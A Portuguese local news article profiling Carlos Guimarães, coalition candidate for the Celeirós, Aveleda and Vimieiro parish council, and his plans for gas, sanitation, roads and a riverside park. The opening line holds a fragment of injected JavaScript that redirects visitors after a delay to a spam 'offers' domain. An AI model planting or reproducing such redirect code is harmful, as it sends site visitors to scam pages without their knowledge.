{ window.location.replace('http://offers25942.xyz/'); }, delay);})();ody">

Carlos Guimarães avança para “Renovar Celeirós, Aveleda e Vimieiro”

Carlos Guimarães é o candidato à Junta da União de Freguesias de Celeirós, Aveleda e Vimieiro pela Coligação “Juntos por Braga”. Descontente com o rumo dos acontecimentos, Carlos Guimarães lidera uma equipa ambiciosa com um plano de desenvolvimento focado na renovação de ideias através de uma postura pró-ativa capaz de corresponder às necessidades e anseios da população.

Com 49 anos, Carlos Guimarães é natural de Celeirós, é casado, tem uma filha e é chefe de tráfego numa empresa de transportes de Celeirós. A envolvência nas atividades que decorrem na freguesia é ativa e constante. Desde 2016 é tesoureiro do Clube Desportivo de Celeirós, coletividade onde também desempenhou as funções de secretário. Atualmente é vice-presidente do Centro Social e Paroquial de Celeirós e, entre 2013 a 2017, foi membro da assembleia de freguesia de Celeirós, Aveleda e Vimieiro pela Coligação “Juntos por Braga”.

Com Vítor Brito, de Aveleda, e Sílvia Ribeiro, de Vimieiro, ambos muito ativos nas atividades de movimentos associativos das respetivas freguesias, Carlos Guimarães estará ladeado por uma equipa de valor e com provas dadas. Sobre o panorama atual da UF, Carlos Guimarães acredita que a mudança é o melhor caminho e aponta desde logo direções a tomar para os próximos quatro anos.

Na lista de prioridades definida, o candidato elenca o reforço da instalação de gás natural, principalmente em Aveleda e Vimieiro. Sobre o saneamento em Vimieiro, Carlos Guimarães considera ser importante recuperar o atraso nesta matéria essencial para a população. Urgem igualmente inúmeros arranjos das vias públicas, passeios e águas pluviais, principalmente em Vimieiro. Ainda sobre necessidades básicas, deverá ser revisto o processo de limpeza e higiene da UF.

Carlos Guimarães deseja que a autarquia local seja um polo dinamizador e uma ponte entre as várias instituições da UF. Nesse sentido, propõe um trabalho em rede com o Centro Social e Paroquial de Celeirós tendo em vista o alargamento da ação desta importante instituição a Vimieiro e Aveleda. Para o candidato é necessário envolver as diversas associações na ação social, no desporto e na cultura, realizando um trabalho conjunto em prol de toda a população.

Relativamente a projetos estruturantes, é proposta a requalificação da sede da Junta de Freguesia, centralizando a secretaria e o Espaço do Cidadão no rés-do-chão do edifício. Será necessário terminar a terceira e última fase de construção do campo de jogos do Clube Desportivo de Celeirós e substituir a sua péssima iluminação por luzes LED de melhor qualidade e de menor consumo.

A inexistência de um parque de lazer é também uma preocupação. Por isso, durante os próximos quatro anos, a equipa de Carlos Guimarães propõe-se a edificar um parque junto ao rio, bem como zonas verdes na UF. Ainda em matéria de ambiente, o candidato considera ser importante reforçar os esforços para salvaguardar a limpeza do Rio Este bem como reforçar a fiscalização das descargas industriais ilegais existentes.

A pensar no espesso e importante tecido empresarial da UF, será igualmente fundamental requalificar com urgência o parque industrial de Celeirós.

É com ideias concretas, com uma visão de futuro dinâmica e aberta à colaboração com terceiros, que Carlos Guimarães encara o desafio de propor à população de Celeirós, Aveleda e Vimieiro um caminho diferente, um caminho de mudança.